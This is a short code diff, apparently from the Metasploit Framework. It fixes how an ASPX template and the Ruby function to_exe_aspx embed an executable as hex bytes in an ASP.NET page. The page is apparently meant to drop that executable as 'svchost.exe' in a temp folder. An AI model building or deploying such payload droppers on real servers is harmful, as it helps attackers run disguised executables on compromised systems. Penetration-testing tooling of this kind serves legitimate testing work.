Fix aspx

data/templates/scripts/to_exe_aspx.aspx.template

@@ -1,10 +1,10 @@
-<%@ Page Language="C#" AutoEventWireup="true" %>
-<%@ Import Namespace="System.IO" %>
+<%%@ Page Language="C#" AutoEventWireup="true" %%>
+<%%@ Import Namespace="System.IO" %%>
 <script runat="server">
 	protected void Page_Load(object sender, EventArgs e)
 	{
 		StringBuilder %{var_file} = new StringBuilder();
-		%{var_file}.Append("\x%{exe[0].to_s(16)}%{shellcode}");
+		%{shellcode}
 		string %{var_tempdir} = Path.GetTempPath();
 		string %{var_basedir} = Path.Combine(%{var_tempdir}, "%{var_filename}");
 		string %{var_tempexe} = Path.Combine(%{var_basedir}, "svchost.exe");

lib/msf/util/exe.rb

@@ -953,8 +953,6 @@ def self.to_vba(framework,code,opts={})
 	end
 
 	def self.to_exe_aspx(exes = '', opts={})
-		exe = exes.unpack('C*')
-
 		hash_sub = {}
 		hash_sub[:var_file] 	= Rex::Text.rand_text_alpha(rand(8)+8)
 		hash_sub[:var_tempdir] 	= Rex::Text.rand_text_alpha(rand(8)+8)
@@ -964,7 +962,8 @@ def self.to_vba(framework,code,opts={})
 		hash_sub[:var_iterator] = Rex::Text.rand_text_alpha(rand(8)+8)
 		hash_sub[:var_proc]	= Rex::Text.rand_text_alpha(rand(8)+8)
 
-		hash_sub[:shellcode] = ""
+		exe = exes.unpack('C*')
+		hash_sub[:shellcode] = "#{hash_sub[:var_file]}.Append(\"\\x#{exe[0].to_s(16)}"
 
 		1.upto(exe.length-1) do |byte|
 				# Apparently .net 1.0 has a limit of 2046 chars per line
@@ -974,6 +973,8 @@ def self.to_vba(framework,code,opts={})
 				hash_sub[:shellcode] << "\\x#{exe[byte].to_s(16)}"
 		end
 
+		hash_sub[:shellcode] << "\");\r\n"
+
 		return read_replace_script_template("to_exe_aspx.aspx.template", hash_sub)
 	end